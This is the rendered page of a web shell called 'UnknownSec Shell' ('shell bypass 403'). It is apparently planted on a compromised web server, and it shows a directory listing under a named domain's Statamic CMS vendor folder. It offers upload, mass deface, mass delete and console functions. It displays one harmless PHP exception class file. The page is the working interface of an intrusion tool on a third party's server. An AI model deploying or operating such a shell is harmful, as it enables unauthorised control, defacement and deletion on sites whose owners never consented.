shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Exceptions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
FormNotFoundException.php
<?php namespace Statamic\Exceptions; class FormNotFoundException extends \Exception { protected $form; public function __construct($form) { parent::__construct("Form [{$form}] not found"); $this->form = $form; } }
© 2026 UnknownSec